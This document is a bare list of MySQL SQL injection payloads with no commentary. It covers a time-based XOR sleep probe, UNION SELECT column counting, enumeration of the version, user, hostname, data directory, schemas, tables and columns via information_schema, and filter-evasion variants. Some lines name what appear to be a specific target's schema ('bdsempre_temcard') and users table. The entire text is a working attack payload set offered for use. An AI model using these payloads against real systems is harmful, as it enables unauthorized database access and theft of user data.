'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z

'+UNION+SELECT+NULL%23
'+UNION+SELECT+NULL,NULL%23
'+UNION+SELECT+NULL,NULL,NULL%23
'+UNION+SELECT+version(),database(),user()%23
'+UNION+SELECT+table_name,NULL,NULL+FROM+information_schema.tables+WHERE+table_schema=database()%23
'+UNION+SELECT+column_name,data_type,NULL+FROM+information_schema.columns+WHERE+table_name='nome_tabela'%23
'+UNION+SELECT+'test','test','test'%23
'+UNION+SELECT+1,2,3%23
'+UNION+SELECT+1,2,3,4,5,table_name,7,8,9,10,11+FROM+information_schema.tables+WHERE+table_schema=database()%23

'+UNION+SELECT+1,2,3,4,5,@@version,7,8,9,10,11%2d%2d
'+UNION+SELECT+1,2,3,4,5,@@version_comment,7,8,9,10,11%2d%2d
'+UNION+SELECT+1,2,3,4,5,database(),7,8,9,10,11%2d%2d
'+UNION+SELECT+1,2,3,4,5,user(),7,8,9,10,11%2d%2d
'+UNION+SELECT+1,2,3,4,5,current_user(),7,8,9,10,11%2d%2d
'+UNION+SELECT+1,2,3,4,5,@@datadir,7,8,9,10,11%2d%2d
'+UNION+SELECT+1,2,3,4,5,@@basedir,7,8,9,10,11%2d%2d

'+UNION+SELECT+1,2,3,4,5,schema_name,7,8,9,10,11+FROM+information_schema.schemata%2d%2d
'+UNION+SELECT+1,2,3,4,5,group_concat(schema_name),7,8,9,10,11+FROM+information_schema.schemata%2d%2d

'+UNION+SELECT+1,2,3,4,5,table_name,7,8,9,10,11+FROM+information_schema.tables%2d%2d
'+UNION+SELECT+1,2,3,4,5,group_concat(table_name),7,8,9,10,11+FROM+information_schema.tables+WHERE+table_schema=database()%2d%2d
'+UNION+SELECT+1,2,3,4,5,table_name,7,8,9,10,11+FROM+information_schema.tables+WHERE+table_schema='bdsempre_temcard'%2d%2d

'+UNION+SELECT+1,2,3,4,5,column_name,7,8,9,10,11+FROM+information_schema.columns+WHERE+table_schema=database()%2d%2d
'+UNION+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11+FROM+information_schema.columns+WHERE+table_name='usuarios'%2d%2d

'+UNION+SELECT+1,2,3,4,5,@@hostname,7,8,9,10,11%23
'+UNION+SELECT+1,2,3,4,5,@@port,7,8,9,10,11%23
'+UNION+SELECT+1,2,3,4,5,connection_id(),7,8,9,10,11%23

'+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,database(),7,8,9,10,11%23
'+%55nion+%53elect+1,2,3,4,5,database(),7,8,9,10,11%23
'+union+distinctrow+select+1,2,3,4,5,database(),7,8,9,10,11%23